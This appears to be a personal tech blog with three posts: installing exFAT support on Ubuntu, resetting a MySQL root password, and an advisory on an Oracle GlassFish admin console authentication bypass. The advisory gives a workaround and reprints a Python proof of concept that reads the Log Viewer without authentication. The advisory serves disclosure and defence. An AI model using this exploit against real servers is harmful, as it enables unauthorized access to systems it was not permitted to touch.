Friday, November 1, 2013

How do I install and mount an exFAT partition?

Microsoft introduced the new exFAT file system with Vista SP1. Extended File Allocation Table (exFAT) is the successor to the old FAT32 file system [1].

As the very first step you may need to add the following URL to your repository base. To add the correct repository to Ubuntu 13.04 and lower:
$sudo apt-add-repository ppa:relan/exfat

To add the correct repository to Ubuntu 13.10:
$sudo add-apt-repository ppa:relan/exfat

To update your package list:
$sudo apt-get update

To search packages pertaining to exfat, following command can be used.
$apt-cache search exfat

Then it will display the following packages.
fuse-exfat - This driver is the first free exFAT file
exfat-utils - A set of utilities for creating, checking, dumping and labelling

To install these packages, following command can be used.
$apt-get install exfat-utils fuse-exfat

During this process, the following extra packages will be installed:
  fuse-utils
The following NEW packages will be installed:
  exfat-utils fuse-exfat fuse-utils

Easiest way to mount the exfat disk is, once the above installation is over, plug the storage device. It will be auto mounted.

Reference:
[1] http://www.tech-recipes.com/rx/2801/exfat_versus_fat32_versus_ntfs/#sthash.Dqeow04Z.dpuf

Monday, October 28, 2013

Reset mysql root Password

I wanted to reset the mysql root password of one of my temporary hosted mysql database server. Since it was not used for a long period of time, I couldn't remember the the root password correctly.

As the first step, I loged into the server as the root user. I was using a Ubuntu 12.04 server.

First log in to the system as a normal user and then 'sudo' to get root access.

As the second step it was need to stop the mysql daemon using the following command.
$/etc/init.d/mysql stop
$service mysql stop


Please note that any of the above command is working fine.

As the third step, I started up the mysql daemon and skipped the grant tables which store the passwords using the following command.
$mysqld_safe --skip-grant-tables

As the next step I connected to mysql without a password.
$mysql --user=root mysql

As the final step I entered the following command to set a password to the root user.
$UPDATE user SET Password=PASSWORD('new-password') WHERE user='root'; FLUSH PRIVILEGES;

The below listed format of the command also worked as expected
$UPDATE mysql.user SET Password=PASSWORD('new-password') WHERE User='root'; FLUSH PRIVILEGES;

Hope this will work fine to you also....:)

Tuesday, March 5, 2013

Security Vulnerabilities: Oracle GlassFish Server Administration Console Authentication Bypass

Description: When the server is vulnerable to Oracle GlassFish Server Administration Console GET Request Authentication Bypass, it fails to enforce authentication on HTTP requests that contain lower case method names (e.g. ’get’). A remote, unauthenticated attacker could exploit this to upload and execute arbitrary code.


Vulnerable packages:    Oracle GlassFish Server 3.0.1
    Sun GlassFish Enterprise Server 2.1.1

Non-vulnerable packages:    Oracle GlassFish Server 3.1
    Contact Oracle for patches for other GlassFish versions

Work around suggested by Core Security [1]:

For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
  1. In the GlassFish Admin Console, go to the Tasks tree.
  2. Navigate through: Network Config > Protocols > admin-listener > HTTP.
  3. There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
  4. Finally, restart GlassFish by doing C:\glassfishv3\bin>asadmin restart-domain
Check the availability:

Nessus Scanner can be used to check the availability of the vulnerability


The following Python code published by Core Security is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication [1]:

import sys
import httplib

def make_trace_request(host, port, selector):

    print '[*] TRACE request: %s' % selector
    headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
                'Host': '%s:%s' % (host, port),
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-us,en;q=0.5',
                'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                'Accept-Encoding': 'gzip,deflate',
                'Connection': 'close',
                'Referer': 'http://%s:%s%s' % (host, port, selector)}

    conn = httplib.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    conn.close()

    print response.status, response.reason
    print response.getheaders()
    print response.read()

if len(sys.argv) != 3:
    print "Usage: $ python poc.py \nE.g:   $ python poc.py 192.168.0.1 4848"
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')


Reference

[1] Source: http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] http://www.securityfocus.com/archive/1/517965/30/0/threaded